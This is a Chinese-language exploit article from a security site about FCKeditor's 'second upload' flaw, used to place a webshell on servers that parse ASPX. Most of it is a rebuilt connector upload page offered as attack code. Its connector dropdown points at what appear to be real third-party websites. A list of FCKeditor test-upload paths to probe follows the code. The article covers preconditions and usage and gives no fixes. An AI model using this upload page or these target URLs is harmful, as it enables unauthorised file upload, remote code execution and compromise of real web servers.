首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
FCKeditor二次上传拿shell
来源:vfocus.net 作者:vfocus 发布时间:2010-09-16  
     FCKeditor二次上传拿shell算是FCKeditor漏洞集中比较经典的了,这个二次上传前提条件是要支持aspx而且要求FckEditor/editor/filemanager/connectors/aspx/connector.aspx文件为删除。二次上传漏洞对ASPX站点来说利用比较方便,成功率也比较高,当然若是ASP的站点,支持ASPX和文件为删的情况下也是没问题的。
      在利用二次上传过程中我们往往都是找到FckEditor中的一些test上传页面来进行上传,不过也有遇到test上传页面全部被删除的情况,之前我便遇见过许多,不过在遇到test上传页面被删除的情况下我们可以本地构造上传页谈后提交,前提要确认FckEditor/editor/filemanager/connectors/aspx/connector.aspx文件存在,并且服务器支持ASPX的解析。
利用代码:
<!--
* FCKeditor - The text editor for Internet - http://www.fckeditor.net
* Copyright (C) 2003-2007 Frederico Caldeira Knabben
*
* == BEGIN LICENSE ==
*
* Licensed under the terms of any of the following licenses at your
* choice:
*
* - GNU General Public License Version 2 or later (the "GPL")
*    http://www.gnu.org/licenses/gpl.html
*
* - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
*    http://www.gnu.org/licenses/lgpl.html
*
* - Mozilla Public License Version 1.1 or later (the "MPL")
*    http://www.mozilla.org/MPL/MPL-1.1.html
*
* == END LICENSE ==
*
* Test page for the File Browser connectors.
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title>FCKeditor - Connectors Tests</title>
    <script type="text/javascript">
function BuildBaseUrl( command )
{
    var sUrl =
        document.getElementById('cmbConnector').value +
        '?Command=' + command +
        '&Type=' + document.getElementById('cmbType').value +
        '&CurrentFolder=' + encodeURIComponent(document.getElementById('txtFolder').value) ;
    return sUrl ;
}
function SetFrameUrl( url )
{
    document.getElementById('eRunningFrame').src = url ;
    document.getElementById('eUrl').innerHTML = url ;
}
function GetFolders()
{
    SetFrameUrl( BuildBaseUrl( 'GetFolders' ) ) ;
    return false ;
}
function GetFoldersAndFiles()
{
    SetFrameUrl( BuildBaseUrl( 'GetFoldersAndFiles' ) ) ;
    return false ;
}
function CreateFolder()
{
    var sFolder = prompt( 'Type the folder name:', 'Test Folder' ) ;
    if ( ! sFolder )
        return false ;
    var sUrl = BuildBaseUrl( 'CreateFolder' ) ;
    sUrl += '&NewFolderName=' + encodeURIComponent( sFolder ) ;
    SetFrameUrl( sUrl ) ;
    return false ;
}
function OnUploadCompleted( errorNumber, fileName )
{
    switch ( errorNumber )
    {
        case 0 :
            alert( 'File uploaded with no errors' ) ;
            break ;
        case 201 :
            GetFoldersAndFiles() ;
            alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ;
            break ;
        case 202 :
            alert( 'Invalid file' ) ;
            break ;
        default :
            alert( 'Error on file upload. Error number: ' + errorNumber ) ;
            break ;
    }
}
this.frames.frmUpload = this ;
function SetAction()
{
    var sUrl = BuildBaseUrl( 'FileUpload' ) ;
    document.getElementById('eUrl').innerHTML = sUrl ;
    document.getElementById('frmUpload').action = sUrl ;
}
    </script>
</head>
<body>
    <table height="100%" cellspacing="0" cellpadding="0" width="100%" border="0">
        <tr>
            <td>
                <table cellspacing="0" cellpadding="0" border="0">
                    <tr>
                        <td>
                            Connector:<br />
                            <select id="cmbConnector" name="cmbConnector">
                                <option value="http://www.chnlvyi.com/Edit/editor/filemanager/connectors/asp/connector.asp" selected="selected">ASP</option>
                                <option value="http://www.chnlvyi.com/edit/editor/filemanager/connectors/aspx/connector.aspx">ASP.Net</option>
                                <option value="https://www.portlandartmuseum.org/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/connector.cfm">ColdFusion</option>
                                <option value="lasso/connector.lasso">Lasso</option>
                                <option value="perl/connector.cgi">Perl</option>
                                <option value="http://www.juejincn.net/admin/fckeditor/editor/filemanager/connectors/php/connector.php">PHP</option>
                                <option value="py/connector.py">Python</option>
                            </select>
                        </td>
                        <td>
                               </td>
                        <td>
                            Current Folder<br />
                            <input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
                        <td>
                               </td>
                        <td>
                            Resource Type<br />
                            <select id="cmbType" name="cmbType">
                                <option value="File" selected="selected">File</option>
                                <option value="Image">Image</option>
                                <option value="Flash">Flash</option>
                                <option value="Media">Media</option>
                                <option value="Invalid">Invalid Type (for testing)</option>
                            </select>
                        </td>
                    </tr>
                </table>
                <br />
                <table cellspacing="0" cellpadding="0" border="0">
                    <tr>
                        <td valign="top">
                            <a href="#" onclick="GetFolders();">Get Folders</a></td>
                        <td>
                               </td>
                        <td valign="top">
                            <a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
                        <td>
                               </td>
                        <td valign="top">
                            <a href="#" onclick="CreateFolder();">Create Folder</a></td>
                        <td>
                               </td>
                        <td valign="top">
                            <form id="frmUpload" action="" target="eRunningFrame" method="post" enctype="multipart/form-data">
                                File Upload<br />
                                <input id="txtFileUpload" type="file" name="NewFile" />
                                <input type="submit" value="Upload" onclick="SetAction();" />
                            </form>
                        </td>
                    </tr>
                </table>
                <br />
                URL: <span id="eUrl"></span>
            </td>
        </tr>
        <tr>
            <td height="100%" valign="top">
                <iframe id="eRunningFrame" src="javascript:void(0)" name="eRunningFrame" width="100%"
                    height="100%"></iframe>
            </td>
        </tr>
    </table>
</body>
</html>
<option value="http://www.xxx.com/FckEditor/editor/filemanager/connectors/aspx/connector.aspx">ASP.Net</option>既是ASXP的上传执行路径,asp和php的也同理,需要时请自行补充!!
FCKeditor 中test 文件的上传地址:
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·Piwik和OpenX多版本存在PHP远程
·PHP168 V6.02整站系统远程执行任
·站易企网站管理系统CTEIMS 1.1 0
·Phpcms2008本地文件包含漏洞及利
·老Y文章管理系统 v2.5 sp2 SQL注
·dede的又一个代码执行
·酷我音乐盒存在DLL劫持漏洞(mfc
·SiteEngine CMS 5.1.0 文件上传
·Phpcms2008本地文件包含漏洞及利
·万博网站管理系统(NWEB)通杀漏洞
·慧博商城系统V6.0注入漏洞
·N点虚拟主机管理系统 致命漏洞。
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved